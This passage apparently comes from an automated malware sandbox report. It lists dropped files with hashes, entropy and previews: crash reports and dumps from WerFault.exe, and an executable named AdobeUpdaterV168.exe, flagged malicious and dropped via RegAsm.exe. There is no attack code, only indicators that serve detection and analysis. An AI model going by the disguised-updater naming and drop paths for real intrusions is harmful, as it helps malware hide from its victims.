SHA-256:	7DF6885DFF4942E40D201D35D3930AE6EC6AB3318B5D962024C5B61DF2BC5D95
SHA-512:	EC2F25E93105C779984365A8AC1A98E11E1F27D43827E9FFB9FBE901C244BBB8DC958E0F070735DEE4AF85163D4A16328C12BFC916A7ABE35E70F3C672A4118C
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.4.2.9.1.7.7.7.1.8.8.8.3.5.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.4.2.9.1.7.7.7.6.2.6.3.3.5.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.7.9.e.3.1.c.a.-.1.5.4.c.-.4.d.5.7.-.a.a.a.b.-.b.d.7.a.3.5.d.8.5.d.3.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.7.d.5.7.7.1.e.-.e.3.2.a.-.4.5.b.a.-.a.4.2.b.-.f.2.f.3.7.a.9.c.1.8.3.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.8.x.9.h.3.c.t.q.k.p.f.T.u.0.s.N.F.0.X.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.6.4.-.0.0.0.1.-.0.0.1.4.-.0.4.e.6.-.f.d.8.f.8.6.c.b.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.9.f.0.4.f.c.7.4.7.d.b.b.d.4.e.2.e.9.5.5.6.7.a.c.9.1.5.5.8.0.a.0.0.0.0.f.f.f.f.!.0.0.0.0.0.0.6.6.f.d.4.4.e.2.c.d.9.2.9.3.a.f.4.1.4.f.7.3.5.b.d.8.0.4.5.6.f.4.e.3.e.b.1.d.!.8.x.9.h.3.c.t.q.k.p.f.T.u.0.s.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_zyJWi2vy29.exe_e0e67866dd5f1e66e4e4566bf6b7d5d6e1114c2_ee315164_bfc38dd3-3233-4c4e-8582-24b040cb3286\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7141156880350015
Encrypted:	false
SSDEEP:	96:KGFT4kIoOaschqN1yDfRgBQXIDcQvc6QcEVcw3cE/H+HbHg/8BRTf3Oy1H3a9/ZX:F13OaIe0BU/AjuGzuiFPZ24IO8Pn
MD5:	47FB40D0B9CD4E4F12A1A4497B593E74
SHA1:	7C120EB390A172AF898B66C409C931CD3945A23F
SHA-256:	74AFB5F3C7D68861DBE7812CB0B9E5919C34D1DEDE8FB09D883BC299340C0726
SHA-512:	C64065F2BFE9E96D25553D8D989C4A7D2C261CEBBE80A00E25604D2D38CD0203CE9E2531FB2F150A0B3D81EF8D1B81F77744D0DFBBE5E5EA13FD5DA932597D36
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.4.2.9.1.7.6.2.1.0.5.8.3.3.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.4.2.9.1.7.6.2.8.2.4.5.8.4.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.f.c.3.8.d.d.3.-.3.2.3.3.-.4.c.4.e.-.8.5.8.2.-.2.4.b.0.4.0.c.b.3.2.8.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.0.0.6.9.4.d.3.-.7.0.2.b.-.4.6.b.8.-.b.8.7.8.-.3.5.e.6.d.c.e.8.6.2.9.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.z.y.J.W.i.2.v.y.2.9...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.7.c.-.0.0.0.1.-.0.0.1.4.-.b.8.1.c.-.b.b.8.6.8.6.c.b.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.4.9.c.2.d.8.d.e.f.2.c.8.2.2.9.4.8.9.3.7.0.a.8.6.8.4.6.f.e.8.5.0.0.0.0.f.f.f.f.!.0.0.0.0.d.8.b.d.f.d.b.7.1.7.b.6.4.e.e.4.c.d.7.a.8.9.2.b.b.d.d.d.2.9.3.f.7.e.a.f.9.1.5.c.!.z.y.J.W.i.2.v.y.2.9...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6087.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Jul 1 07:16:02 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	49630
Entropy (8bit):	1.660366621031851
Encrypted:	false
SSDEEP:	192:V30yPmukOMOCCHjX8oW5rjUyly5uIVRIuq5PkHpK075X:VkdYjxsoW5rjUyly5uIVRIuq5cU07l
MD5:	EA61209B036B57955B07E462FA1AD18C
SHA1:	F72514D3A5B097C882A6EE428A8094D915CB1230
SHA-256:	059C6C705C3C0F7E5E37C9989BDBA5C94BAD442DED6462DCBD344F2A5206CB2A
SHA-512:	8A793B3421A57E30CFE2866888B575066FA213CC34E659ACBA4E8EE3BCAB2F92BF36318683C1159EA386E1043190E371EE0B1E319594E9882519C1D4F1ED5F33
Malicious:	false
Preview:	MDMP..a..... ........W.f........................0...........d...n$..........T.......8...........T...............N...........,...........................................................................................eJ..............GenuineIntel............T.......\|....W.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6114.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8310
Entropy (8bit):	3.6967573977189536
Encrypted:	false
SSDEEP:	192:R6l7wVeJGS6yD6Y99SUZusgmfDJD8prT89bqCsfgum:R6lXJj6yD6YXSUZusgmfDJDdqBfg
MD5:	890A61F8C3B3A010A307C849ABC40002
SHA1:	E534A9C4B80259C5B279FDE95B2FB73A36F3CBD0
SHA-256:	28F2367DDF86176650ACB3509250C7A937499111C8F180248F1CE82EF5324C6D
SHA-512:	5C0408B69AA07DCEC12C5361406BC3F2742C6BDD4C271982AEFCF02F7A5BB3FC42BD06F5C30DFD1C637CBDC084329A25EF989CE7B460D2272A2364D564971020
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.4.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER627D.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4585
Entropy (8bit):	4.462391914401271
Encrypted:	false
SSDEEP:	48:cvIwWl8zsxNJg77aI9/cWpW8VYfbYm8M4J9iFWK+q8qzZlKMXWd:uIjfxnI7FV7VnJ7KdZRXWd
MD5:	33D79EF316BBDA0C8C8C89803813B953
SHA1:	FEE53D79AC2055CE23C33C553FDCD2A58D0D4115
SHA-256:	D0FEF7EC903050D70CA1E9F744FF16B38402E60AEB405A82CDAE45354EE029E9
SHA-512:	D4475DBE4A982DF19591ED1BC40019E4BCFF6E68642FBDC668A4548F033EB0E88AE98616B83792B940D4B47F1F1D8ED2946E1F6E644A11D2B4D883F53D15C407
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="391578" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9988.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Jul 1 07:16:16 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	48728
Entropy (8bit):	1.7075881673254594
Encrypted:	false
SSDEEP:	192:jwFcnFRQsOgN0jIJ2H+MyB2ljlzgMT/JoHPr70N3AY:8a+W0jI4c2l9g2aMN
MD5:	BD7293D24F500075F55F2345830332EB
SHA1:	24030F2F99FE51653F4C369881F6E95726B64E98
SHA-256:	404F810F5F6BA0BD79A0A5E1276B824C2A3F4CE24EAAD42AF791B0E307BB30E7
SHA-512:	E6DBCC457F59E60C10AC298FAA78FFE71E22E03F9819E5FB8538BB7314EF26E149FCF13749AD51AC05079D68945033B587C5AE393EE59C7F1C9E5E8409B907A4
Malicious:	false
Preview:	MDMP..a..... ........W.f........................0...........d....$..........T.......8...........T...............@...........,...........................................................................................eJ..............GenuineIntel............T.......D....W.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9A26.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8384
Entropy (8bit):	3.7130924796065323
Encrypted:	false
SSDEEP:	192:R6l7wVeJyyk68pO6YR16ZfJogmfwJJJgprZ89b/LsfBB1m:R6lXJc6YO6Yz6hJogmfwJJJj/Qf4
MD5:	F1F8B548FC0F5FBF1F1515AE5A472972
SHA1:	1D06CE85DEFA35AC917118AA9154A077834F7E93
SHA-256:	4C307800354B674BA98DA2E1D6571222CEF49E7B7888910DF4C48EF7B9ACD91B
SHA-512:	56146B8F336D1D88E53A75B95094736962B1511CE66B8778FC7719ADE0C115C883C483DF2DF16AE98894BC467779606834217E06D7E1DF1DE732FDBBD71328B2
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.0.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9A65.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4685
Entropy (8bit):	4.560300977441134
Encrypted:	false
SSDEEP:	48:cvIwWl8zsxNJg77aI9/cWpW8VYfaYm8M4JuEmFGc+q8jujugKE/U1UDwMdd:uIjfxnI7FV7V2JcfudaLdd
MD5:	45A1DF8178AD7F9A459AA0163046CA76
SHA1:	1B41F920AC5380228B084D969947BDC6F723AE27
SHA-256:	6D266F52F14DE7225EBA2FF0D44525D2597F4545A68D17D685AF252C60184E63
SHA-512:	F8B6B4FD9D000489A92E3B4AC2893B28243F0025D70F9D87AE75132080402BCEE17A38067AB47D2288D721836726364340A2C40C82998A860362A21EA575ECD4
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="391578" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9B7C.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Jul 1 07:16:17 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	49844
Entropy (8bit):	1.6565767196866505
Encrypted:	false
SSDEEP:	96:5D8L9Kb6Y+VzFoNWgfmVLydkoi7P9tMuZYS/Hmfo79WpiNsJD+RwPLby3g+At2WW:Sx3nJJ0BOZMopW0NsWwW3zIBWnWsm7
MD5:	026508FC68A9A9CB104A6F6BC568FC78
SHA1:	C42A9BDB026DD77313A5A23D10F5C7311A6D3619
SHA-256:	FA8F2C0972ACA4CA22FE0928DBE7F6B064E4C9CAF3CBF20782BFDCCCCD03E418
SHA-512:	7C6202E940D910A2419BD8276DE0BC8000BF7F193A23B60F52822CFD41CC4B9482F2B81CC6B7EF164650BB34C93877921309DDDDAD29AC8561CF6CF758973A2C
Malicious:	false
Preview:	MDMP..a..... ........W.f........................0................$..........T.......8...........T...........@...t...........,...........................................................................................eJ..............GenuineIntel............T.......d....W.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C39.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8328
Entropy (8bit):	3.7007099081159796
Encrypted:	false
SSDEEP:	192:R6l7wVeJ6eH6kKN6YRW6bfzKgmfK9JD8prZ89b2xsfQym:R6lXJz6R6YQ6rzKgmfWJDv2qfk
MD5:	199195049E449713254C9E3EDA3694C3
SHA1:	50E7CF22630DADCFD68164AF924F0131E03018EB
SHA-256:	84530298C224C90848DBAD288BF3B6C815F994A201E89614BF423212D7111F1C
SHA-512:	186702BA6DFFB90C3E17000D37D80FCE34200272D6A82858DD0A18C32D8A5E52EACBEC66D29CB027E5B5E78A8B324BA5E52843C77C12B313015D22CB354C7B60
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.2.6.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9CA7.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4635
Entropy (8bit):	4.4975289228075255
Encrypted:	false
SSDEEP:	48:cvIwWl8zsxNJg77aI9/cWpW8VYfSYm8M4JDQNiFpr+q8dQcpk6d8md:uIjfxnI7FV7VKJ08rxQVCmd
MD5:	D8322F469FE878448E10BA7FC14B58E7
SHA1:	6268369CA13EAB3DD27179A44013B30E413F05A4
SHA-256:	6554A0EA0AE006B7F2F8103D1685989C2C64C5C6B019E5FD2C92A3D61FAE7881
SHA-512:	16EA2541FC8CB1BFF769727311104C3DC88636F579555CEAAA20390043265587E7C9A93DAEB9432BC6F9D66E22C7D9B169557595DF59C99CCE6138F882B456D5
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="391578" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA4E3.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Jul 1 07:16:19 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	48568
Entropy (8bit):	1.710903352226374
Encrypted:	false
SSDEEP:	96:5h8jeH6Y+V9dLFRgfmVOmPi7X9KUAaiOJ+Ry+OLP8PDyh2sZJl7U8fgyM5yB6hZA:gHnFRsmPO4aIsTYUfo8b6yB6RSGa+
MD5:	6E257B7A887D9F45A5EF13249975C03A
SHA1:	91D43A678DFAF63E7334420B3F2736229FF71F2F
SHA-256:	88594790C70F8F2320F1B1960FA97D0B78BF8636D7D83C2628332B9492A96426
SHA-512:	41BAC4DBBF98B6D7B1EEF2D475201D2895CA1764E9DECF780589917D541D74E731F396F6828941EEBDBCFCF9C8D0920528D3DF84B9DD3CAB5CB95D4F8FA2DFBC
Malicious:	false
Preview:	MDMP..a..... ........W.f........................0...........d....$..........T.......8...........T...........................,...........................................................................................eJ..............GenuineIntel............T............W.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA561.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8378
Entropy (8bit):	3.707944087935646
Encrypted:	false
SSDEEP:	192:R6l7wVeJpj6k6YR26yfMXgmfKJJa0prj89bYusf4om:R6lXJd6k6YQ6IMXgmfKJJAYtf+
MD5:	490E44F13E0E24F55E659677345CA46D
SHA1:	8C43FB28B8983DDCE9DD7ECFF35499CD3BC83626
SHA-256:	CB30C4782167EEA660A454A238240E1891F59E5BE3072FF28E823E43DE39FCF3
SHA-512:	6A820E7F39A69EA8DB04880EDA3BEA969059E150CB64EC88105A7D054A4796BBDABAD5B9028F6112F4D67821106D1414EB47D696681C259B74C3F12D5B8E37A9
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.3.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA66B.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4685
Entropy (8bit):	4.5450719870529515
Encrypted:	false
SSDEEP:	48:cvIwWl8zsIJg77aI9/cWpW8VYflYm8M4JCJFAP+q8KZKyWAd:uIjfOI7FV7VZJ1RvWAd
MD5:	019876A3E5179226E8D3D5A4D7CCD672
SHA1:	92BAA0A5ADBA72C1EEB566D48265F8F7C9DA43FA
SHA-256:	F2358A331DFEBB99B19D62C2EF3887D2CA2169DD1A9B0D466FB1ED5D55938451
SHA-512:	4DA36ED441622658FF365CBB87E23F489421B4BAEE2AC3584767B497061B43B257A5B0A2A895B62D74DC48A1A920819B0D855C5516C4DB6335EA0DB38949E96C
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="391579" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\AdobeUpdaterV168.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1854464
Entropy (8bit):	7.954001690712007
Encrypted:	false
SSDEEP:	49152:Ktx9fJc02euDyRs7NNvZpFW3wrqirfHWZjlavwpX:Ktx9fe02beG5Nv+w+irHWZjlavwpX
MD5:	97768AB0A4837757B74DE2AE892BADAB
SHA1:	D8BDFDB717B64EE4CD7A892BBDDD293F7EAF915C
SHA-256:	0F88EA51A56DA966D12311A4B20EA3A6C44315E00747A589F19CF535F90CED77
SHA-512:	78BC5C866B12FCC82CDDA20622694824B227A4D522632FFCA4B6608BB5245A5E39C28E7F10DFD9E253407A922DAE47A83171FB3F605597AF4F7186C3AAF5DCDE
Malicious:	true
